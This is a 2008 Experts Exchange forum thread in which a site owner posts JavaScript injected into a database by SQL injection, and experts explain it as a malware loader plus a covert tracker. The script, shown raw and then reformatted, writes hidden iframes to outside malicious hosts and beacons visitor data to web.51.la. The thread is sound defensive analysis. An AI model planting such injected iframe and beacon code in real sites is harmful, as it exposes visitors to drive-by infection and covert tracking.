Still celebrating National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17

x
?
Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
3
Medium Priority
?
943 Views
Last Modified: 2008-06-10
Our SQL Server DB was infected with some sort of SQL injection - I downloaded th .js and it is as follows:

document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



window.onerror=function(){return true};
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
0
Comment
Question by:samic400
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
3 Comments
 
LVL 6

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess that this an attempt to circumvent sites that publish user inputs like blogs and feedbacks.
0
 
LVL 3

Accepted Solution

by:
NizzeK earned 2000 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

The code checks you pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. Then it is printed in disguise of a utility, sending the collected information and identity to the data collector at web.51.la.
The code itself is not harmful, but it could reveal something unwanted.
I have reformatted the code to see the structure easier.

Best regards
Nils


document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 
if (navigator.systemLanguage=='zh-cn')
{
 
}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}
 
window.onerror=function(){return true};
document.write ('
	<script>
		var a3327tf="51la";
		var a3327pu="";
		var a3327pf="51la";
		var a3327su=window.location;
		var a3327sf=document.referrer;
		var a3327of="";
		var a3327op="";
		var a3327ops=1;
		var a3327ot=1;
		var a3327d=new Date();
		var a3327color="";
		if (navigator.appName=="Netscape")
			     {a3327color=screen.pixelDepth;} 
			else {a3327color=screen.colorDepth;}
	<\/script>
	<script>
		a3327tf=top.document.referrer;
	<\/script>
	<script>
		a3327pu =window.parent.location;
	<\/script>
	<script>
		a3327pf=window.parent.document.referrer;
	<\/script>
	<script>
		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);
		var a3327oe =new Date();
		a3327oe.setTime(a3327oe.getTime()+60*60*1000);
		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";
			path=/;
			expires="+a3327oe.toGMTString();
		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
		if (a3327ot==null)
			     {a3327ot=1;}
			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}
		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);
		document.cookie="AJSTAT_ok_times="+a3327ot+";
			path=/;
			expires="+a3327oe.toGMTString();
	<\/script>
	<script>
		a3327of=a3327sf;
		if (a3327pf!=="51la")
			     {a3327of=a3327pf;}
		if(a3327tf!=="51la")
			     {a3327of=a3327tf;}
		a3327op=a3327pu;
		try{lainframe}catch(e){a3327op=a3327su;}
		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'
			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'
			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');
	<\/script>');

Open in new window

0
 
LVL 3

Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808
0

Featured Post

The top UI technologies you need to be aware of

An important part of the job as a front-end developer is to stay up to date and in contact with new tools, trends and workflows. That’s why you cannot miss this upcoming webinar to explore the latest trends in UI technologies!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Introduction HTML checkboxes provide the perfect way for a web developer to receive client input when the client's options might be none, one or many.  But the PHP code for processing the checkboxes can be confusing at first.  What if a checkbox is…
Nothing in an HTTP request can be trusted, including HTTP headers and form data.  A form token is a tool that can be used to guard against request forgeries (CSRF).  This article shows an improved approach to form tokens, making it more difficult to…
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…

705 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question